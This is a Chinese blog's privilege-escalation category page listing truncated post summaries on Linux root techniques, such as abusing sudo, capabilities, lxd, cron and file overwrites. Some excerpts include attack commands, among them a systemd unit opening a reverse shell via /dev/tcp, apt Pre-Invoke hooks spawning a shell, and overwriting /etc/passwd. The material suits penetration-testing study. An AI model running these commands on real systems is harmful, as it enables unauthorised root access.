随笔分类 - 权限提升
摘要:Dstat 是 vmstat、iostat 和 ifstat 的通用替代品。Dstat 克服了一些限制并添加了一些额外的功能。具体详细介绍可以参考:https://linux.die.net/man/1/dstat dstat有个功能就是提供了用户自定义插件的能力,既然用户可以自定义,那么当这个命令
阅读全文
摘要:getcap -r / 2>/dev/null /usr/bin/python2.7 = cap_sys_admin+ep Using python you can mount a modified passwd file on top of the real passwd file: cp /et
阅读全文
摘要:当用户可以修改apache配置文件(/etc/apache2/apache2.conf)时,可以修改apache2的启动权限。 1、查看apache2配置文件的权限是否可写 ls -al /etc/apache2/apache2.conf 2、修改配置文件,配置启动用户为提权的目标用户。 *这里不能
阅读全文
摘要:而motd是负责ssh登录后,页面欢迎语 提示语的,用户可以通过配置文件自定义欢迎提示信息。具体配置文件在/etc/update-motd.d/* ,理论上这个目录下的任意文件都可以。通常修改99-header文件即可。 一、检查/etc/update-motd.d/00-header文件权限是否可
阅读全文
摘要:sudo配合useradd命令也是可以用来提权的。整体思路是添加一个组为sudo的用户,然后用这个新用户执行sudo su到root 首先看下useradd添加用户的几个必要条件,指定组,指定密码,useradd有这么几个参数可以使用 Usage: useradd [options] LOGIN u
阅读全文
摘要:*注:该方法仅限用户在sudo组中且知道用户密码的情况下进行,如果只是在sudoers中配置了用户,则无法提权。但如果在sudo组,有没有配置sudoers就无所谓了 1、检查pkexec的执行策略 cat /etc/polkit-1/localauthority.conf.d/* 如果看到有配置A
阅读全文
摘要:sudo运行时默认会启用env_reset选项将从命令行设置的环境变量复原,因此通常情况下,当使用sudo命令时,通过本地修改环境变量也没法替换目标文件来进行提权,但如果sudo在配置时为用户设置了SETENV选项,情况就不一样了。SETENV会允许用户禁用env_reset选项,允许sudo使用当
阅读全文
摘要:tar命令有两个参数 --checkpoint --checkpoint-action –checkpoint[=NUMBER] 显示每个Numbers记录的进度消息(默认值为10) –checkpoint-action=ACTION 在每个checkpoint(检查点)上执行ACTION 这里的‘
阅读全文
摘要:当python具备cap_sys_ptrace+ep 能力时,可以用来进行提权。提权原理见:https://blog.pentesteracademy.com/privilege-escalation-by-abusing-sys-ptrace-linux-capability-f6e6ad2a59
阅读全文
摘要:cd /tmp apt download socat tar zxvvf socat.tar.gz dpkg -x socat/socat*.deb . rm -rf socat cp usr/bin/socat . https://github.com/Plazmaz/CVE-2019-18634
阅读全文
摘要:当当前用户具有lxd权限时(通过id命令可以查看),可以通过创建任意镜像,并将当前系统根目录挂载到镜像mnt目录下,然后通过chroot命令即可获取当前系统的root权限 一、使用lxc创建一个ubuntu容器并导入到lxd中(通常网上资料都alpine镜像,但其实可以使用任意容器):*如果本地没有
阅读全文
摘要:Capabilities是linux的一种访问控制能力,能够更精细化的将操作系统权限(网络,文件等)赋权给应用程序,其中就包括设置uid和gid的权限。因此具备cap_setuid和cap_setgid权限的程序可以用来进行权限提升 一、查找设置过capabilities的应用程序 /usr/sbi
阅读全文
摘要:当systemctl具备suid位或sudo权限时,可以用来进行提权。 一、首先编写一个service unit用来被systemctl加载 echo '[Service] Type=oneshot ExecStart=/bin/bash -c "/bin/bash -i > /dev/tcp/x.
阅读全文
摘要:passwd文件的密码会被系统优先教研,所以可以通过覆盖passwd文件来尝试进行提权 passwd密码文件格式为: root:x:0:0::/root:/bin/bash x为密码位,在用shadow前提下这个位置位x, 0:0分别是uid位和gid位,当为0时即为root权限 用如下命令生成密码
阅读全文
摘要:两种提权方式 一、 TF=$(mktemp) echo 'Dpkg::Pre-Invoke {"/bin/sh;false"}' > $TF sudo apt install -c $TF sl 二、 sudo apt update -o APT::Update::Pre-Invoke::=/bin
阅读全文
摘要:来自:https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh 这个脚本非常厉害,可以枚举linux操作系统几乎所有的可提权项,甚至可以通过su暴力
阅读全文
摘要:当scp命令有免密sudo的权限时,可以用来进行提权到其他账号 1、确认scp有sudo免密权限 test@test:~$ sudo -l sudo -l Matching Defaults entries for test on test: env_reset, mail_badpass, sec
阅读全文
摘要:当hping3工具有个神奇的地方,hping3支持交互式运行,终端中输入hping3后可以进入一个hping3的控制台,这个控制台不但可以执行hping3自己的命令,也可以把非自身命令定向到shell终端去,当作系统命令执行,因此当hping3具有suid位或者用户有权限通过sudo执行hping3
阅读全文
摘要:当用户可以通过sudo执行dd命令时,可以被用来提权。通过dd命令覆盖原始/etc/passwd文件,以达到修改密码的目的 1、创建一个已知密码的hash,以备替换时使用 hh@hh:/etc$ openssl passwd -1 -salt 123 password $1$123$0HaaUtbh
阅读全文
摘要:1、计划任务提权法: 进入机器后,寻找root,通过查看/etc/crontab,或者/etc/cron.*中的计划任务,看是否存在root权限调用的计划任务,如果这些计划任务的脚本可以被任意用户修改,可以通过在这些计划任务中增加提权脚本进行提权 2、命令截断提权: 假设某程序如下代码,其中syst
阅读全文
